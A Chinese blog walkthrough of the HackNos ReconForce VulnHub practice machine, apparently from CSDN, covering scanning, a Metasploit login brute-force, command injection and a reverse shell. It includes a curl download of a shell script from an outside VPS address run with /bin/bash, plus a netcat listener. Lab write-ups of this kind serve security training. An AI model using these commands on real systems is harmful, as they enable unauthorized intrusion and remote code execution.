Hacknos-ReconForce靶机

最新推荐文章于 2024-07-27 14:51:42 发布
最新推荐文章于 2024-07-27 14:51:42 发布
阅读量139 收藏
点赞数 2
文章标签: 网络 linux 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71232352/article/details/140379689
版权

1.修改网络连接模式为桥接并通过VirtualBox来打开靶机kali作为攻击者并扫描主机IP地址

2.端口扫描

3.访问主页80端口

4.点击troubleshoot会弹出一个登录框

5.dirb扫描目录

6.发现没有有用信息 通过msf进行登录爆破

use auxiliary/scanner/http/http_login
show options	# 获知密码的字典位置,把“Security@hackNos”加入到密码字典中
set AUTH_URI /5ecure/
set STOP_ON_SUCCESS true
set RHOSTS 192.168.1.93
exploit

7.登录

8.跳转到了这个页面发现上边写的ping像是rce漏洞抓包分析

9.读取到了/etc/passwd文件

10.反弹shell在vps上编辑一个sh文件1.sh

11.启动临时web服务并设置监听8888端口

python3 -m http.server 8000
nc -lvvp 8888

12.远程下载

curl http://47.121.133.57:8000/1.sh -o 1.sh 
chmod +x 1.sh
/bin/bash 1.sh

13.成功反弹

左提溜
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
靶机系列测试 Os-hackNos-11
08-03
1.收集信息 3.对Drupal 7.57进行安全检测 5.解密文件 7.特权提升
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
hacknos-reconforce靶机
weixin_73074638的博客
07-11 208
开放了三个端口。
Hacknos-ReconForce靶机渗透测试
weixin_58786230的博客
07-12 237
【代码】Hacknos-ReconForce靶机渗透测试。
Vulnhub靶机:HACKNOS_ RECONFORCE (V1.1)
LainWith的博客
02-05 1966
目录介绍信息收集主机发现主机信息探测测试21(ftp)访问网站目录扫描登录爆破命令执行反弹shellFlag1切换身份提权获取Flag2方法1:sudo提权方法2:docer提权参考 介绍 系列: hackNos(此系列共7台) 发布日期:2019 年 11 月 29 日 难度:初级-中级 Flag : 2个,一个普通用户的,一个根用户的 学习: msf爆破网站登录框 命令执行漏洞 msf反弹shell sudo提权、docker提权 靶机地址:https://www.vulnhub.com/entry
vulnhub-hackNos-Reconforce
qq_41810304的博客
02-26 327
下载地址:https://www.vulnhub.com/entry/hacknos-reconforce,416/ 前言: 作为小白(此处省略n个字),文章提到的工具及漏洞仅用于学习。最近有没有什么好看的番剧啊,求推荐啊!!!蹲在家里好无聊啊!!! Kali:192.168.1.4 目标机:192.168.1.28 信息收集(确切的说应该是端口扫描): 漏洞挖掘: 从扫...
vulnhub靶机 Os-hackNos-1
weixin_46107179的博客
03-02 3862
Os-hackNos-1: 靶机下载 https://www.vulnhub.com/entry/hacknos-os-hacknos,401 下载好靶机之后,如果通过虚拟机打开,不能获取ip地址,kali机也扫描不到靶机ip地址的话,就在启动界面按shift,会出现该画面 然后按e进入编辑界面,将ro改为rw single init=/bin/bash 然后按Ctrl+x进入命令行,ip -a查看网卡,名称为ens33,然后对网卡信息进行编辑 vim /etc/network/interfaces改为如下
Hacknos-ReconForce
weixin_52953960的博客
07-12 269
【代码】Hacknos-ReconForce
VulnHub:Hacknos-ReconForce
wbplife的博客
07-12 242
不知道登录名是什么,也懒得测试,直接拿msf爆破,连找字典都省了。接下来就需要切换身份为 recon 了,前面曾使用msf爆破过网站,将其字典拿过来,供hydra爆破。爆破出网站的账号密码:admin,Security@hackNos,登录之后,如下图。就是目标靶机...使用Nmap进行详细的扫描发现开放了21/22/80端口....服务提供下载...开启MSF监听模块...并在目标站点上下载并执行PHP代码..爆破出用户名:recon,密码:Security@hackNos。工具进行主机发现...出现。
Hacknos-ReconForce打靶渗透
m0_65112983的博客
07-14 397
Hacknos-ReconForce打靶渗透
Vulnhub-Os-hackNos-1(包含靶机获取不了IP地址)
m0_60894143的博客
07-07 806
发现wget具有suid权限,而且普通用户可以执行,那么可以通过下载目标靶机上的passwd文件,然后添加一个有root权限的用户到passwd文件中,然后使用wget -O将内容重定向到目标靶机的/etc/passwd中。https://download.vulnhub.com/hacknos/Os-hackNos-1.ova #靶机下载地址。需要搜索到带有s的文件,开始查找 find / -perm -u=s -type f 2>/dev/null。推荐使用arp-scan -l。
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
sqli-labs-master靶机
10-12
sqli-labs是一个专门为学习和测试SQL注入技术而设计的靶机平台,它提供了多个层次的练习,帮助用户逐步理解和掌握SQL注入的防范与应对策略。 一、sqli-labs靶机介绍 sqli-labs靶机由一系列精心设计的挑战组成,每个...
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Linux网络工具“瑞士军刀“集合
分享不一样的技术,与你一起共同成长!
07-26 287
下面结合之前的一些使用经验为大家介绍一下一些经典应用场景下,这个网络命令工具如何使用的。例如怎么查看当前服务器监听哪些端口、连接目标主机端口情况如何?平常我们在进行Linux服务器相关运维的时候,总会遇到一些网络相关的问题。我们可以借助这些小巧、功能强悍的工具帮助我们排查问题、解决问题...
S5730举例
最新发布
jjjxxxhhh123的博客
07-27 653
例子: 假设在校园网络中,某些交换机之间存在多个连接(可能是多个光纤),如果没有STP,这些多个连接可能导致数据包在网络中无限制地传输,形成网络风暴,导致整个网络瘫痪。PIM-SM通过仅在需要时在网络中传输组播数据包,减少网络带宽的占用,提高数据传输效率。[sysname-GigabitEthernet0/0/1] ospf cost 10 // 设置接口的OSPF成本,影响路径选择。综上所述,这些网络技术和配置在大学校园网络中起到关键作用,确保网络运行高效、安全和可靠,同时满足用户的多样化需求。
使用WebSocket协议调用群发方法将消息返回客户端页面
2302_79840586的博客
07-27 922
使用WebSocket协议调用群发方法将消息返回客户端页面
【计算机网络】OSPF单区域实验
m0_65787507的博客
07-26 898
DR和BDR是由同一网段中所有的路由器根据路由优先级和Router ID通过Hello报文选举出来的,只有优先级大于0的路由器才具有选举资格。进行DR/BDR选举时每台路由器将自己选出的DR写入Hello报文中,发给网段上的每台运行OSPF协议的路由器。如果DR或BDR失效,或者有新的路由器加入网络并希望成为DR或BDR,那么它们将参与新的选举过程。4:非DR路由器将自己的LSA发送给DR,然后DR将这些LSA泛洪到整个区域,使所有路由器获得一致的LSDB,从而确保区域内路由器都能计算出相同的最短路径树。
kali linux部署upload-labs靶机
09-08
要在Kali Linux上部署upload-labs靶机,您需要按照以下步骤进行操作: 1. 首先,您需要通过SSH连接到一个Linux主机。根据提供的端口和地址,使用以下命令连接到目标主机: `ssh -p 25142 root@node4.buuoj.cn` 2....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值